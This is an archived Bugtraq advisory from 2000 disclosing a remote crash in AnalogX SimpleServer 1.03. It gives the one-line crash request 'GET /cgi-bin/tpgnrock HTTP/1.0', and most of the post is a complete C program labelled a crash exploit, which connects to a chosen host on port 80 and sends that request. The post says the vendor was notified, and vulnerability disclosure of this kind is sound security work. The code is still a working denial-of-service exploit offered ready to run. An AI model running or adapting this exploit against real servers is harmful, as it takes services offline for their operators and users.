[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: AnalogX SimpleServer 1.03 Remote Crash
From: presto chango <presto () REGIONONLINE ! COM>
Date: 2000-03-25 17:13:20
[Download RAW message or body]
# [t P G]
# [tPG ADVISORY]
# [Author: Presto]
# [Title: AnalogX SimpleServer 1.03 Remote Crash ]
# [Date: Mar.23.2k ]
# [Description]
This problem is similar to the one USSRback.com
reported on in Dec.1999
in reference to version 1.01. In that report, a 'GET'
command with 1000 char
buffer would cause a buffer overflow. After running the code
below (which is
derived from some cgi scan code), version 1.03 committed to
a crash. This is
one of those bugs I find trivial. Any requested file with
'GET' involved over
or below 17 characters will not crash the server.
The crash string below:
GET /cgi-bin/tpgnrock HTTP/1.0
The server side would have recieved a message of this
context:
ASSERT: Pointer is NULL (..\..\EMUCORE\emu-str.c/284)
I think its a problem in the c0de. (duh.)
# [Code]
---start here---
/*
Code ripped from a cgi scanner.
I actually stumbled upon the exploit through this code.
C0D3 == M3SSY. Whatever.
-Presto/tPG
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin,foreign=0;
char ojsimp[20];
char *okay[2];
char *player[2];
okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
player[1] = "Check if its running now.";
if (argc<2)
{
printf("\n HOSTNAME PLEASE@!# ");
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t Crash Exploit for AnalogX SimpleServer
v1.03\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n HTTPD Version. \n");
getchar();
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t Press something. \n");
getchar();
while(count++ < 2)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
printf(" %s : ",player[count]);
for(numin=0;numin < 20;numin++)
{
ojsimp[numin] = '\0';
}
send(sock, okay[count],strlen(okay[count]),0);
recv(sock, ojsimp, sizeof(ojsimp),0);
cgistr = strstr(ojsimp,foundmsg);
if( cgistr != NULL)
{
printf("Heh.\n");++foreign;
}
else printf(" tPG\n");
close(sock);
}
if (foreign)
{
printf("bl3h. bl4h. h3h. w00p. 33p.\n");
}
}
---End here---
# [Other Notes]
AnalogX has been informed with the situation.
url: http://www.analogx.com
Version 1.03 on NT server 4.0 affected.
No other combinations have been attempted at this point.
# [EOF]
http://www.tpgn.net
Unscrewing your nuts and bolts.
-
This message was sent from:
http://www.regiononline.com !
Stop by and see what's going on in YOUR region NOW!
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic